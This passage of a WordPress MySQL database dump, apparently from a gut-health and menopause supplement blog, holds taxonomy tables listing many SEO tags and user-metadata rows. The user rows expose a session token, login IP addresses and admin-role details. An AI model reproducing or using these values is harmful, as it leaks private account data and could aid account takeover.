post_tag','',0,1),(118,118,'post_tag','',0,0),(119,119,'post_tag','',0,1),(120,120,'post_tag','',0,0),(155,155,'post_tag','',0,1),(121,121,'post_tag','',0,0),(122,122,'post_tag','',0,0),(123,123,'post_tag','',0,0),(156,156,'post_tag','',0,1),(124,124,'post_tag','',0,0),(125,125,'post_tag','',0,0),(126,126,'post_tag','',0,0),(157,157,'post_tag','',0,1),(127,127,'post_tag','',0,4),(128,128,'post_tag','',0,0),(129,129,'post_tag','',0,1),(130,130,'post_tag','',0,1),(131,131,'post_tag','',0,1),(132,132,'post_tag','',0,1),(158,158,'post_tag','',0,0),(133,133,'post_tag','',0,1),(134,134,'post_tag','',0,1),(135,135,'post_tag','',0,1),(159,159,'post_tag','',0,0),(136,136,'post_tag','',0,1),(137,137,'post_tag','',0,1),(138,138,'post_tag','',0,1),(139,139,'post_tag','',0,1),(161,161,'post_tag','',0,0),(140,140,'post_tag','',0,3),(141,141,'post_tag','',0,2),(142,142,'post_tag','',0,1),(143,143,'post_tag','',0,0),(144,144,'post_tag','',0,0),(145,145,'post_tag','',0,0),(146,146,'post_tag','',0,0),(147,147,'post_tag','',0,1),(148,148,'post_tag','',0,2),(149,149,'post_tag','',0,0),(150,150,'post_tag','',0,1),(151,151,'post_tag','',0,1),(162,162,'post_tag','',0,0),(163,163,'post_tag','',0,0),(164,164,'post_tag','',0,0),(165,165,'post_tag','',0,0),(166,166,'post_tag','',0,0),(167,167,'post_tag','',0,0),(168,168,'post_tag','',0,0),(169,169,'post_tag','',0,0),(170,170,'post_tag','',0,0),(171,171,'post_tag','',0,0),(172,172,'post_tag','',0,0),(173,173,'post_tag','',0,0),(174,174,'post_tag','',0,0),(175,175,'post_tag','',0,0),(176,176,'post_tag','',0,0),(177,177,'post_tag','',0,1),(178,178,'post_tag','',0,0),(179,179,'post_tag','',0,0),(180,180,'post_tag','',0,0),(181,181,'post_tag','',0,1),(182,182,'post_tag','',0,1),(183,183,'post_tag','',0,1),(184,184,'post_tag','',0,0),(185,185,'post_tag','',0,0),(186,186,'post_tag','',0,0),(187,187,'post_tag','',0,0),(188,188,'post_tag','',0,0),(189,189,'post_tag','',0,0),(190,190,'post_tag','',0,0),(191,191,'post_tag','',0,0),(192,192,'post_tag','',0,1),(193,193,'post_tag','',0,0),(194,194,'post_tag','',0,2),(195,195,'post_tag','',0,0),(196,196,'post_tag','',0,0),(197,197,'post_tag','',0,0),(198,198,'post_tag','',0,0),(199,199,'post_tag','',0,0),(200,200,'post_tag','',0,0),(201,201,'post_tag','',0,0),(202,202,'post_tag','',0,0),(203,203,'post_tag','',0,0),(204,204,'post_tag','',0,0),(205,205,'post_tag','',0,0),(206,206,'post_tag','',0,0),(207,207,'post_tag','',0,0),(208,208,'post_tag','',0,0),(209,209,'post_tag','',0,0),(210,210,'post_tag','',0,0),(211,211,'post_tag','',0,0),(212,212,'post_tag','',0,0),(213,213,'post_tag','',0,0),(214,214,'post_tag','',0,0),(215,215,'post_tag','',0,0),(216,216,'post_tag','',0,0),(217,217,'post_tag','',0,0),(218,218,'post_tag','',0,1),(219,219,'post_tag','',0,2),(220,220,'post_tag','',0,1),(221,221,'post_tag','',0,1),(222,222,'post_tag','',0,1),(223,223,'post_tag','',0,1),(224,224,'post_tag','',0,1),(225,225,'post_tag','',0,1),(226,226,'post_tag','',0,1),(227,227,'post_tag','',0,1),(228,228,'post_tag','',0,1),(229,229,'post_tag','',0,1),(230,230,'post_tag','',0,1),(231,231,'post_tag','',0,1),(232,232,'post_tag','',0,1),(233,233,'post_tag','',0,1),(234,234,'post_tag','',0,1),(235,235,'post_tag','',0,1),(236,236,'post_tag','',0,1),(237,237,'post_tag','',0,1),(238,238,'post_tag','',0,2),(239,239,'post_tag','',0,1),(240,240,'post_tag','',0,1),(241,241,'post_tag','',0,1),(242,242,'post_tag','',0,1),(248,248,'post_tag','',0,1),(243,243,'post_tag','',0,1),(244,244,'post_tag','',0,1),(245,245,'post_tag','',0,1),(246,246,'post_tag','',0,0),(247,247,'post_tag','',0,1),(249,249,'post_tag','',0,1),(250,250,'post_tag','',0,1),(251,251,'post_tag','',0,1),(252,252,'post_tag','',0,1),(253,253,'post_tag','',0,1),(254,254,'post_tag','',0,0),(255,255,'post_tag','',0,0),(256,256,'post_tag','',0,0),(257,257,'post_tag','',0,0),(258,258,'post_tag','',0,0),(259,259,'post_tag','',0,0),(260,260,'post_tag','',0,0),(261,261,'post_tag','',0,0),(262,262,'post_tag','',0,0),(263,263,'post_tag','',0,1),(264,264,'post_tag','',0,0),(265,265,'post_tag','',0,1),(266,266,'post_tag','',0,1),(267,267,'post_tag','',0,1),(268,268,'post_tag','',0,1),(269,269,'post_tag','',0,1),(270,270,'post_tag','',0,1),(271,271,'post_tag','',0,1),(272,272,'post_tag','',0,1),(273,273,'post_tag','',0,1),(274,274,'post_tag','',0,0),(275,275,'post_tag','',0,1),(276,276,'post_tag','',0,1),(277,277,'post_tag','',0,1),(278,278,'post_tag','',0,1),(279,279,'post_tag','',0,0),(280,280,'post_tag','',0,1),(281,281,'post_tag','',0,1),(282,282,'post_tag','',0,0),(283,283,'post_tag','',0,1),(284,284,'post_tag','',0,1),(285,285,'post_tag','',0,1),(286,286,'post_tag','',0,1),(287,287,'post_tag','',0,1),(288,288,'post_tag','',0,1),(289,289,'post_tag','',0,1),(290,290,'post_tag','',0,1),(291,291,'post_tag','',0,1),(292,292,'post_tag','',0,1),(293,293,'post_tag','',0,1),(294,294,'post_tag','',0,1),(295,295,'post_tag','',0,1),(296,296,'post_tag','',0,1),(297,297,'post_tag','',0,1),(298,298,'post_tag','',0,0),(299,299,'post_tag','',0,0),(300,300,'post_tag','',0,0),(301,301,'post_tag','',0,0),(302,302,'post_tag','',0,0),(303,303,'post_tag','',0,1),(304,304,'post_tag','',0,1),(305,305,'post_tag','',0,1),(306,306,'post_tag','',0,1),(307,307,'post_tag','',0,1),(308,308,'post_tag','',0,1),(309,309,'post_tag','',0,0),(310,310,'post_tag','',0,0),(311,311,'post_tag','',0,0),(312,312,'post_tag','',0,0),(313,313,'post_tag','',0,0),(314,314,'post_tag','',0,0),(315,315,'post_tag','',0,0),(316,316,'post_tag','',0,0),(317,317,'post_tag','',0,0),(318,318,'post_tag','',0,0),(319,319,'post_tag','',0,0),(320,320,'post_tag','',0,1),(321,321,'post_tag','',0,0),(322,322,'post_tag','',0,1),(323,323,'post_tag','',0,1),(324,324,'post_tag','',0,1),(325,325,'post_tag','',0,1),(326,326,'post_tag','',0,0),(327,327,'post_tag','',0,1),(328,328,'post_tag','',0,1),(329,329,'post_tag','',0,0),(330,330,'post_tag','',0,0),(331,331,'post_tag','',0,0); /*!40000 ALTER TABLE `wpvt_term_taxonomy` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_termmeta` -- DROP TABLE IF EXISTS `wpvt_termmeta`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_termmeta` ( `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `term_id` bigint(20) unsigned NOT NULL DEFAULT 0, `meta_key` varchar(255) DEFAULT NULL, `meta_value` longtext DEFAULT NULL, PRIMARY KEY (`meta_id`), KEY `term_id` (`term_id`), KEY `meta_key` (`meta_key`(191)) ) ENGINE=MyISAM AUTO_INCREMENT=28 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_termmeta` -- LOCK TABLES `wpvt_termmeta` WRITE; /*!40000 ALTER TABLE `wpvt_termmeta` DISABLE KEYS */; INSERT INTO `wpvt_termmeta` (`meta_id`, `term_id`, `meta_key`, `meta_value`) VALUES (1,46,'order','0'),(2,47,'order','0'),(3,48,'order','0'),(4,49,'order','0'),(5,50,'order','0'),(6,33,'product_count_product_tag','15'),(7,37,'product_count_product_tag','15'),(8,38,'product_count_product_tag','15'),(9,31,'product_count_product_tag','1'),(10,35,'product_count_product_tag','1'),(11,36,'product_count_product_tag','1'),(12,42,'product_count_product_tag','1'),(13,34,'product_count_product_tag','1'),(14,46,'product_count_product_cat','4'),(15,47,'product_count_product_cat','3'),(16,48,'product_count_product_cat','3'),(17,49,'product_count_product_cat','3'),(18,50,'product_count_product_cat','3'),(19,54,'qodef_portfolio_category_image_meta',''),(20,72,'qodef_portfolio_category_image_meta',''),(21,97,'qodef_portfolio_category_image_meta',''),(22,92,'qodef_portfolio_category_image_meta',''),(23,63,'qodef_portfolio_category_image_meta',''),(24,99,'qodef_portfolio_category_image_meta',''),(25,96,'qodef_portfolio_category_image_meta',''),(26,93,'qodef_portfolio_category_image_meta',''),(27,105,'qodef_portfolio_category_image_meta',''); /*!40000 ALTER TABLE `wpvt_termmeta` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_terms` -- DROP TABLE IF EXISTS `wpvt_terms`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_terms` ( `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(200) NOT NULL DEFAULT '', `slug` varchar(200) NOT NULL DEFAULT '', `term_group` bigint(10) NOT NULL DEFAULT 0, PRIMARY KEY (`term_id`), KEY `slug` (`slug`(191)), KEY `name` (`name`(191)) ) ENGINE=MyISAM AUTO_INCREMENT=332 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_terms` -- LOCK TABLES `wpvt_terms` WRITE; /*!40000 ALTER TABLE `wpvt_terms` DISABLE KEYS */; INSERT INTO `wpvt_terms` (`term_id`, `name`, `slug`, `term_group`) VALUES (1,'Uncategorized','uncategorized',0),(2,'simple','simple',0),(3,'grouped','grouped',0),(4,'variable','variable',0),(5,'external','external',0),(6,'exclude-from-search','exclude-from-search',0),(7,'exclude-from-catalog','exclude-from-catalog',0),(8,'featured','featured',0),(9,'outofstock','outofstock',0),(10,'rated-1','rated-1',0),(11,'rated-2','rated-2',0),(12,'rated-3','rated-3',0),(13,'rated-4','rated-4',0),(14,'rated-5','rated-5',0),(15,'Uncategorized','uncategorized',0),(16,'Health','health',0),(17,'Nature','nature',0),(18,'Organic','organic',0),(19,'Pure','pure',0),(20,'Recipe','recipe',0),(21,'Vegan','vegan',0),(22,'Workout','workout',0),(23,'beauty','beauty',0),(24,'fruit','fruit',0),(25,'makeup','makeup',0),(26,'nature','nature',0),(27,'organic','organic',0),(28,'seeds','seeds',0),(29,'spa','spa',0),(30,'vegan','vegan',0),(31,'beauty','beauty',0),(32,'Body Balance','body-balance',0),(33,'fashion','fashion',0),(34,'fresh','fresh',0),(35,'fruit','fruit',0),(36,'herbs','herbs',0),(37,'metallics','metallics',0),(38,'organic','organic',0),(39,'Organic','organic',0),(40,'Spa','spa',0),(41,'Spa','spa-organic',0),(42,'vegan','vegan',0),(43,'Yoga','yoga',0),(44,'Yoga Dance','yoga-dance',0),(45,'Zumba','zumba',0),(46,'Beauty','beauty',0),(47,'Equipment','equipment',0),(48,'Food','food',0),(49,'Make Up','make-up',0),(50,'Spa','spa',0),(51,'Calm','calm',0),(52,'Fresh','fresh',0),(53,'Joy','joy',0),(54,'Divided Left','divided-left',0),(55,'Divided Left','divided-left-2',0),(59,'Divided Right','divided-right',0),(63,'Divided Right','divided-right-2',0),(64,'Full Screen Menu','full-screen-menu',0),(67,'Full Screen Menu','full-screen-menu-2',0),(68,'Full Screen Menu','full-screen-menu-3',0),(71,'Full Screen Menu','full-screen-menu-4',0),(72,'Main Menu','main-menu',0),(79,'Vertical Menu','vertical-menu',0),(83,'Vertical Menu','vertical-menu-2',0),(84,'Vertical Menu','vertical-menu-3',0),(87,'Quote','post-format-quote',0),(88,'Audio','post-format-audio',0),(89,'Link','post-format-link',0),(90,'Gallery','post-format-gallery',0),(91,'Video','post-format-video',0),(92,'RECIPES FOR HAPPY TUMMIES','recipes',0),(93,'LOW FODMAP','low-fodmap',0),(94,'ARTICLES & NEWS','articles-news',0),(95,'FREE RESOURCES','free-resources',0),(96,'WORKING WITH A DIETITIAN','working-with-a-dietitian',0),(97,'tummy menu','tummy-menu',0),(99,'mobile','mobile',0),(100,'FODMAP Recipe','fodmap-recipe',0),(101,'Food to improve gut health','food-to-improve-gut-health',0),(102,'Gut Health','gut-health',0),(103,'IBS Food','ibs-food',0),(104,'Easy Health Food','easy-health-food',0),(105,'Probiotics for Gut Health','probiotics-for-gut-health',0),(106,'perimenopause','perimenopause',0),(107,'menopause','menopause',0),(108,'Bone broth','bone-broth',0),(109,'Healing the gut','healing-the-gut',0),(110,'Food for better gut health','food-for-better-gut-health',0),(111,'supplements for menopause','supplements-for-menopause',0),(112,'menopause health','menopause-health',0),(113,'urinaryproblems','urinaryproblems',0),(114,'cranburryhealth','cranburryhealth',0),(115,'menopauseuninaryissue','menopauseuninaryissue',0),(116,'gutproblems','gutproblems',0),(117,'menopause suppliments','menopause-suppliments',0),(118,'greens','greens',0),(119,'magnesium','magnesium',0),(120,'suppliment','suppliment',0),(121,'hotflashes','hotflashes',0),(122,'woman\'s health','womans-health',0),(123,'sweating','sweating',0),(124,'sex drive','sex-drive',0),(125,'herbal remedies','herbal-remedies',0),(126,'sex life','sex-life',0),(127,'probiotics','probiotics',0),(128,'postmenopause','postmenopause',0),(129,'Post Menopause','post-menopause',0),(130,'weight loss','weight-loss',0),(131,'weight loss suppliments','weight-loss-suppliments',0),(132,'menopause weight','menopause-weight',0),(133,'drepression','drepression',0),(134,'menopause and depression','menopause-and-depression',0),(135,'supplement for depression','supplement-for-depression',0),(136,'boost appetite','boost-appetite',0),(137,'appetite','appetite',0),(138,'menopause and appetite','menopause-and-appetite',0),(139,'loss of appetite','loss-of-appetite',0),(140,'Gut Healing','gut-healing',0),(141,'BEst Probiotics','best-probiotics',0),(142,'top Probiotics','top-probiotics',0),(143,'Alcohol and gut health','alcohol-and-gut-health',0),(144,'what affects gut health','what-affects-gut-health',0),(145,'Alcohol and health','alcohol-and-health',0),(146,'Microbiome and alcohol','microbiome-and-alcohol',0),(147,'Juicers','juicers',0),(148,'Juicing','juicing',0),(149,'Top Juicers','top-juicers',0),(150,'Best Juicers','best-juicers',0),(151,'Juicers comparison','juicers-comparison',0),(152,'IBS and probiotics','ibs-and-probiotics',0),(153,'IBS Relief','ibs-relief',0),(154,'IBS Probiotics','ibs-probiotics',0),(155,'Gut Problems','gut-problems',0),(156,'Micorbiome','micorbiome',0),(157,'What Probiotics','what-probiotics',0),(158,'Gut Health supplement','gut-health-supplement',0),(159,'Does Probiotics work','does-probiotics-work',0),(160,'Does Enzymes work','does-enzymes-work',0),(161,'Suppliments for gut health','suppliments-for-gut-health',0),(162,'Improve gut health','improve-gut-health',0),(163,'Fibre supplements for gut health','fibre-supplements-for-gut-health',0),(164,'Which supplements for gut health','which-supplements-for-gut-health',0),(165,'IBS exercises','ibs-exercises',0),(166,'crohnes exercises','crohnes-exercises',0),(167,'Stomach friendly exersices','stomach-friendly-exersices',0),(168,'Gut Exeersices','gut-exeersices',0),(169,'Exercises for gut health','exercises-for-gut-health',0),(170,'the gut and hormones','the-gut-and-hormones',0),(171,'Does gut health affect your hormones','does-gut-health-affect-your-hormones',0),(172,'How does gut health affect hormones','how-does-gut-health-affect-hormones',0),(173,'Gut & hormones','gut-hormones',0),(174,'Can the gut affect your hormones','can-the-gut-affect-your-hormones',0),(175,'Gut Shots','gut-shots',0),(176,'Gut Health Shots','gut-health-shots',0),(177,'Health shots','health-shots',0),(178,'Are Health shots good for you','are-health-shots-good-for-you',0),(179,'Does health shots work','does-health-shots-work',0),(180,'Which health shots are the best','which-health-shots-are-the-best',0),(181,'Gut Heath Shots','gut-heath-shots',0),(182,'Gut Health Remedies','gut-health-remedies',0),(183,'Healing your Gut','healing-your-gut',0),(184,'Gluten allergy','gluten-allergy',0),(185,'Gluten sensitivity','gluten-sensitivity',0),(186,'Wheat sensitivity','wheat-sensitivity',0),(187,'Suppliments for GLuten allergy','suppliments-for-gluten-allergy',0),(188,'Suppliments for Gluten Sensitivity','suppliments-for-gluten-sensitivity',0),(189,'Gluten allergy supplements','gluten-allergy-supplements',0),(190,'Supplements to reduce symptoms','supplements-to-reduce-symptoms',0),(191,'How to reduce gluten symptoms','how-to-reduce-gluten-symptoms',0),(192,'probiotic','probiotic',0),(193,'health food','health-food',0),(194,'after menopause','after-menopause',0),(195,'Food and suppliments','food-and-suppliments',0),(196,'How to enhance supplements with food','how-to-enhance-supplements-with-food',0),(197,'Does supplements work','does-supplements-work',0),(198,'Shall I take supplements','shall-i-take-supplements',0),(199,'How good are suppliments','how-good-are-suppliments',0),(200,'The best supplements for gut health','the-best-supplements-for-gut-health',0),(201,'supplements','supplements',0),(202,'do supplements work?','do-supplements-work',0),(203,'Best Supplements','best-supplements',0),(204,'Food & Supplements','food-supplements',0),(205,'Enzyme for gut health','enzyme-for-gut-health',0),(206,'Enzymes for gut health','enzymes-for-gut-health',0),(207,'Better digestion with Enzymes','better-digestion-with-enzymes',0),(208,'What does enzymes do','what-does-enzymes-do',0),(209,'why do I need emzymes','why-do-i-need-emzymes',0),(210,'can enzymes help digestion','can-enzymes-help-digestion',0),(211,'How does enzymes improve gut health','how-does-enzymes-improve-gut-health',0),(212,'Probiotics for gut health','probiotics-for-gut-health',0),(213,'Best probiotics for IBS','best-probiotics-for-ibs',0),(214,'The right Probiotic','the-right-probiotic',0),(215,'DOe Probiotics work','doe-probiotics-work',0),(216,'How does probiotic work','how-does-probiotic-work',0),(217,'Why should I take probiotics','why-should-i-take-probiotics',0),(218,'stress','stress',0),(219,'Lactobacillus acidophilus','lactobacillus-acidophilus',0),(220,'Bifidobacterium','bifidobacterium',0),(221,'Lactobacillus rhamnosus:','lactobacillus-rhamnosus',0),(222,'Lactobacillus casei','lactobacillus-casei',0),(223,'Saccharomyces boulardi','saccharomyces-boulardi',0),(224,'Nurse your gut health','nurse-your-gut-health',0),(225,'after menopause strategies','after-menopause-strategies',0),(226,'probiotics after menopause for your gut health','probiotics-after-menopause-for-your-gut-health',0),(227,'Bifidobacterium Probiotics','bifidobacterium-probiotics',0),(228,'Lactobacillus Rhamnosus','lactobacillus-rhamnosus-2',0),(229,'Saccharomyces Boulardii','saccharomyces-boulardii',0),(230,'Best probiotics menopausal woman','best-probiotics-menopausal-woman',0),(231,'gut health guide menopause','gut-health-guide-menopause',0),(232,'B Vitamin','b-vitamin',0),(233,'Probiotics for menopause','probiotics-for-menopause',0),(234,'Calcium and Magnesium','calcium-and-magnesium',0),(235,'Evening Primrose Oil','evening-primrose-oil',0),(236,'Soy Isoflavones','soy-isoflavones',0),(237,'Black Cohosh','black-cohosh',0),(238,'omega 3 fatty acids','omega-3-fatty-acids',0),(239,'st.John\'s Wort for depression','st-johns-wort-for-depression',0),(240,'Vitamin D','vitamin-d',0),(241,'Vitamin B','vitamin-b',0),(242,'Black cohosh for mood swings','black-cohosh-for-mood-swings',0),(243,'cranberry extract','cranberry-extract',0),(244,'D-Mannose','d-mannose',0),(245,'Probiotics for Urinary Problems','probiotics-for-urinary-problems',0),(246,'Probiotic Urinary Problems','probiotic-urinary-problems',0),(247,'Pumpkin Seed Extract benefit urinary system','pumpkin-seed-extract-benefit-urinary-system',0),(248,'Enzymes','enzymes',0),(249,'digestive enzymes','digestive-enzymes',0),(250,'Why enzymes','why-enzymes',0),(251,'top 5 digestive enzymes','top-5-digestive-enzymes',0),(252,'enzyme recommended','enzyme-recommended',0),(253,'Best Enzymes','best-enzymes',0),(254,'Anzymes','anzymes',0),(255,'Choosing enzymes','choosing-enzymes',0),(256,'top enzymes','top-enzymes',0),(257,'top enzymes 2023','top-enzymes-2023',0),(258,'enzyme recommendation','enzyme-recommendation',0),(259,'gut suppliments','gut-suppliments',0),(260,'digestive suppliments','digestive-suppliments',0),(261,'digestive supplements','digestive-supplements',0),(262,'Gut Supplements','gut-supplements',0),(263,'zinc','zinc',0),(264,'vitamin B complex','vitamin-b-complex',0),(265,'Gingeng','gingeng',0),(266,'Ashwagandha','ashwagandha',0),(267,'Maca root for appetite','maca-root-for-appetite',0),(268,'improve appetite during menopause','improve-appetite-during-menopause',0),(269,'probiotics for weight loss','probiotics-for-weight-loss',0),(270,'calcium good for weight loss','calcium-good-for-weight-loss',0),(271,'blog about digestive problems','blog-about-digestive-problems',0),(272,'sunscreen for sensitive skin','sunscreen-for-sensitive-skin',0),(273,'best sunscreen','best-sunscreen',0),(274,'reef+friendly sunscreen','reeffriendly-sunscreen',0),(275,'sunblock','sunblock',0),(276,'fragrance-free sunscreen','fragrance-free-sunscreen',0),(277,'waterproof sunscreen','waterproof-sunscreen',0),(278,'Bone broth and weight loss','bone-broth-and-weight-loss',0),(279,'Loose weight with none broth','loose-weight-with-none-broth',0),(280,'How to loose weight with bone broth','how-to-loose-weight-with-bone-broth',0),(281,'Can bone broth help loose weight','can-bone-broth-help-loose-weight',0),(282,'Why bone brith','why-bone-brith',0),(283,'Why bone broth','why-bone-broth',0),(284,'benefits of bone broth','benefits-of-bone-broth',0),(285,'Body & bone broth','body-bone-broth',0),(286,'Health & bone broth','health-bone-broth',0),(287,'How does bone brioth help','how-does-bone-brioth-help',0),(288,'What bone broth','what-bone-broth',0),(289,'Why is Bone Brith good for you','why-is-bone-brith-good-for-you',0),(290,'why probiotics','why-probiotics',0),(291,'how can probiotics help','how-can-probiotics-help',0),(292,'What probiotics to choose','what-probiotics-to-choose',0),(293,'How does probiotic help IBS','how-does-probiotic-help-ibs',0),(294,'Which probiotics for IBS','which-probiotics-for-ibs',0),(295,'probiotics for diarrhoea','probiotics-for-diarrhoea',0),(296,'Probiotics for constipation','probiotics-for-constipation',0),(297,'Probiotic for bloating','probiotic-for-bloating',0),(298,'does probiotic work','does-probiotic-work',0),(299,'which probiotic','which-probiotic',0),(300,'what probiotic','what-probiotic',0),(301,'how does probiotic help','how-does-probiotic-help',0),(302,'can probiotic','can-probiotic',0),(303,'Top 5 Enzymes and Probiotic Supplement','top-5-enzymes-and-probiotic-supplement',0),(304,'What does Enzymes and Probiotics do','what-does-enzymes-and-probiotics-do',0),(305,'Benefits of Enzymes and Probiotics Supplement','benefits-of-enzymes-and-probiotics-supplement',0),(306,'Supplements for Gut Health','supplements-for-gut-health',0),(307,'Best in test supplements for gut health','best-in-test-supplements-for-gut-health',0),(308,'Which Enzyme and Probiotic supplemets','which-enzyme-and-probiotic-supplemets',0),(309,'Probiotics and em','probiotics-and-em',0),(310,'Sykes benegits','sykes-benegits',0),(311,'Probiotics and enzymes benefits','probiotics-and-enzymes-benefits',0),(312,'Why Probiotics and enzymes supplements','why-probiotics-and-enzymes-supplements',0),(313,'Top 5 Combines enzymes and probiotics supplements','top-5-combines-enzymes-and-probiotics-supplements',0),(314,'Top supplements for gut','top-supplements-for-gut',0),(315,'Top supplements for IBS','top-supplements-for-ibs',0),(316,'Improve gut health with supplements','improve-gut-health-with-supplements',0),(317,'How to improve Gut Health','how-to-improve-gut-health',0),(318,'Best way to improve gut health','best-way-to-improve-gut-health',0),(319,'Fibre Supplements','fibre-supplements',0),(320,'Why Fibre supplements are good for your gut','why-fibre-supplements-are-good-for-your-gut',0),(321,'Fibre Supplements to Improve Gut Health','fibre-supplements-to-improve-gut-health',0),(322,'BEst Fibre Supplements','best-fibre-supplements',0),(323,'Top 5 Fibre Supplements','top-5-fibre-supplements',0),(324,'Benefits of Fiber supplements','benefits-of-fiber-supplements',0),(325,'Fiber Supplements','fiber-supplements',0),(326,'BEst Fiber Supplements','best-fiber-supplements',0),(327,'Fiber supplements to improve gut health','fiber-supplements-to-improve-gut-health',0),(328,'Gut Fibers','gut-fibers',0),(329,'Fibre Suppl','fibre-suppl',0),(330,'TOp 5 Fiber Supplements','top-5-fiber-supplements',0),(331,'Why fibre supplements','why-fibre-supplements',0); /*!40000 ALTER TABLE `wpvt_terms` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_timetable_guests` -- DROP TABLE IF EXISTS `wpvt_timetable_guests`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_timetable_guests` ( `guest_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(250) DEFAULT NULL, `email` varchar(100) DEFAULT NULL, `phone` varchar(50) DEFAULT NULL, `message` text DEFAULT NULL, PRIMARY KEY (`guest_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_timetable_guests` -- LOCK TABLES `wpvt_timetable_guests` WRITE; /*!40000 ALTER TABLE `wpvt_timetable_guests` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_timetable_guests` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_usermeta` -- DROP TABLE IF EXISTS `wpvt_usermeta`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_usermeta` ( `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `user_id` bigint(20) unsigned NOT NULL DEFAULT 0, `meta_key` varchar(255) DEFAULT NULL, `meta_value` longtext DEFAULT NULL, PRIMARY KEY (`umeta_id`), KEY `user_id` (`user_id`), KEY `meta_key` (`meta_key`(191)) ) ENGINE=MyISAM AUTO_INCREMENT=160 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_usermeta` -- LOCK TABLES `wpvt_usermeta` WRITE; /*!40000 ALTER TABLE `wpvt_usermeta` DISABLE KEYS */; INSERT INTO `wpvt_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (1,1,'nickname','Mini Gut Guru'),(2,1,'first_name',''),(3,1,'last_name',''),(4,1,'description',''),(5,1,'rich_editing','true'),(6,1,'syntax_highlighting','true'),(7,1,'comment_shortcuts','false'),(8,1,'admin_color','fresh'),(9,1,'use_ssl','0'),(10,1,'show_admin_bar_front','true'),(11,1,'locale',''),(12,1,'wpvt_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(13,1,'wpvt_user_level','10'),(14,1,'dismissed_wp_pointers','vc_pointers_backend_editor,theme_editor_notice,plugin_editor_notice'),(15,1,'show_welcome_panel','1'),(79,2,'session_tokens','a:1:{s:64:\"7eb1725d83c5e705c6dbf92094c34f7a2b55e051abb13a4834fd57793f9196d0\";a:4:{s:10:\"expiration\";i:1599861853;s:2:\"ip\";s:13:\"37.111.129.42\";s:2:\"ua\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36\";s:5:\"login\";i:1599689053;}}'),(65,2,'nickname','Sara'),(66,2,'first_name','Sara'),(67,2,'last_name','Food'),(68,2,'description',''),(69,2,'rich_editing','true'),(70,2,'syntax_highlighting','true'),(71,2,'comment_shortcuts','false'),(72,2,'admin_color','fresh'),(73,2,'use_ssl','0'),(74,2,'show_admin_bar_front','true'),(17,1,'wpvt_dashboard_quick_press_last_post_id','5788'),(18,1,'community-events-location','a:1:{s:2:\"ip\";s:13:\"213.226.141.0\";}'),(19,1,'_woocommerce_tracks_anon_id','woo:Ft/zWLx3FoQCknCuTLYEnoTq'),(20,1,'wc_last_active','1692835200'),(21,1,'_order_count','0'),(24,1,'nav_menu_recently_edited','97'),(25,1,'managenav-menuscolumnshidden','a:5:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";i:4;s:15:\"title-attribute\";}'),(26,1,'metaboxhidden_nav-menus','a:13:{i:0;s:28:\"add-post-type-portfolio-item\";i:1;s:25:\"add-post-type-team-member\";i:2;s:21:\"add-post-type-product\";i:3;s:20:\"add-post-type-events\";i:4;s:12:\"add-post_tag\";i:5;s:15:\"add-post_format\";i:6;s:22:\"add-portfolio-category\";i:7;s:17:\"add-portfolio-tag\";i:8;s:17:\"add-team-category\";i:9;s:25:\"add-testimonials-category\";i:10;s:15:\"add-product_cat\";i:11;s:15:\"add-product_tag\";i:12;s:19:\"add-events_category\";}'),(29,1,'closedpostboxes_wpematico','a:0:{}'),(30,1,'metaboxhidden_wpematico','a:5:{i:0;s:11:\"youtube-box\";i:1;s:11:\"bbpress-box\";i:2;s:16:\"xml-campaign-box\";i:3;s:7:\"slugdiv\";i:4;s:12:\"temp_postbox\";}'),(31,1,'wpvt_user-settings','libraryContent=browse&posts_list_mode=list&edit_element_vcUIPanelWidth=635&edit_element_vcUIPanelLeft=697px&edit_element_vcUIPanelTop=18px&editor=tinymce&mfold=o&hidetb=1'),(32,1,'wpvt_user-settings-time','1695116795'),(35,1,'edit_post_per_page','50'),(37,1,'wpvt_media_library_mode','list'),(42,1,'closedpostboxes_post','a:2:{i:0;s:9:\"formatdiv\";i:1;s:27:\"qodef-meta-box-general_meta\";}'),(43,1,'metaboxhidden_post','a:10:{i:0;s:11:\"postexcerpt\";i:1;s:13:\"trackbacksdiv\";i:2;s:16:\"commentstatusdiv\";i:3;s:7:\"slugdiv\";i:4;s:9:\"authordiv\";i:5;s:39:\"qodef-meta-box-post_format_gallery_meta\";i:6;s:37:\"qodef-meta-box-post_format_video_meta\";i:7;s:37:\"qodef-meta-box-post_format_audio_meta\";i:8;s:36:\"qodef-meta-box-post_format_link_meta\";i:9;s:37:\"qodef-meta-box-post_format_quote_meta\";}'),(53,1,'closedpostboxes_page','a:1:{i:0;s:1